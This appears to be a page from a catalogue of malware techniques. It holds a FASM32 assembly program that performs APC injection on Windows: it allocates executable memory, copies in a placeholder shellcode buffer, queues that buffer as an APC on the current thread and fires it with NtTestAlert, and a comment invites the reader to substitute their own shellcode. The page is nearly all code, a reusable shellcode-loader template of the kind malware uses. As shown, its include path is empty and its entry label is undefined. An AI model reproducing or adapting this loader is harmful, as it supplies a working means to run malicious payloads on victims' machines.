Windows FASM32 / APC injection

Author Jean-Pierre LESUEUR (DarkCoderSc)
Platform Windows
Language FASM32
Technique APC injection


format PE GUI 4.0
entry main

include ''

section '.code' readable executable

; **************************************************
; * Code
        ; VirtualAlloc()
        xor eax, eax                                   ; NULL
        push PAGE_EXECUTE_READWRITE                    ; VirtualAlloc.flProtect
        push MEM_COMMIT or MEM_RESERVE                 ; VirtualAlloc.flAllocationType
        push [shellcode_length]                        ; VirtualAlloc.dwSize
        push eax                                       ; VirtualAlloc.lpAddress
        call [VirtualAlloc]
        test eax, eax
        jz exit

        ; Copy Shellcode to Allocated Memory Region
        mov edi, eax                                    ; Destination
        mov esi, shellcode                              ; Source
        mov ecx, [shellcode_length]                     ; Count
        rep movsb                                       ; Copy
        mov esi, eax                                    ; eax eq destination

        ; GetCurrentThread()
        call [GetCurrentThread]
        mov ebx, eax

        ; QueueUserAPC()
        xor eax, eax
        push eax                                        ; QueueUserAPC.dwData
        push ebx                                        ; QueueUserAPC.hThread (Current Thread)
        push esi                                        ; QueueUserAPC.pfnAPC (Copied Shellcode)
        call [QueueUserAPC]
        test eax, eax
        jz exit

        ; NtTestAlert()
        call [NtTestAlert]
        ; ExitProcess()
        xor eax, eax
        inc eax                                         ; ExitCode = 1
        push eax                                        ; ExitProcess.uExitCode
        call [ExitProcess]

; **************************************************
; * Data
section '.data' data readable

; Replace with your own shellcode
shellcode               db      0xcc, 0x90, 0x90, 0x90, 0x90

shellcode_length        dd      $ - shellcode

; **************************************************
; * Imports
section '.idata' import data readable

library kernel32, 'KERNEL32.dll',\
        ntdll, 'NTDLL.DLL'

import kernel32,\
       ExitProcess, 'ExitProcess',\
       GetCurrentThread, 'GetCurrentThread',\
       QueueUserAPC, 'QueueUserAPC',\
       VirtualAlloc, 'VirtualAlloc'

import ntdll,\
       NtTestAlert, 'NtTestAlert'


May 22, 2024

Last Revised

May 22, 2024